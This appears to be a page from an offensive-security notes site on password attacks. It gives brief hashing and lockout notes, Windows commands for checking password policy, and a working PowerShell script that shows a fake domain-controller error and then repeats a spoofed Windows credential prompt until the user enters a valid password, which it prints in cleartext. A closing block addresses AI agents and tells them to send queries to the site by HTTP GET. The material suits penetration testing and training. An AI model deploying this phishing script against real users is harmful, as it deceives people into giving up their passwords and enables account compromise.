# Password Attacks

File hashing should be fast - used to determine integrity

Password hashing should be SLOW - used to increase amount of work for cracking

Be careful not to lock out legitimate users, as this will impact operational needs of the target

Check windows password settings

```bash
net accounts
net accounts /domain
```

Sometimes, we can just ask for creds!

```
# POC from greg.foss[at]owasp.org
# @enigma0x3
# Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

function Invoke-Prompt {
    [CmdletBinding()]
    Param (
        [Switch] $ProcCreateWait,
        [String] $MsgText = 'Lost contact with the Domain Controller.',
        [String] $IconType = 'Critical',
        [String] $Title = 'ERROR - 0xA801B720'
    )
    Add-Type -AssemblyName Microsoft.VisualBasic
    Add-Type -assemblyname System.DirectoryServices.AccountManagement
    $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
    
    if($MsgText -and $($MsgText -ne '')){
        $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title)
    }
    
    $c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
    $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
    
    if($credential){
           while($DS.ValidateCredentials($c, $credential.GetNetworkCredential().password) -ne $True){
              $credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
          }
        "[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().password
    }
    else{
        "[!] User closed credential prompt"
    }
}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.m4lwhere.org/offensive/password-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.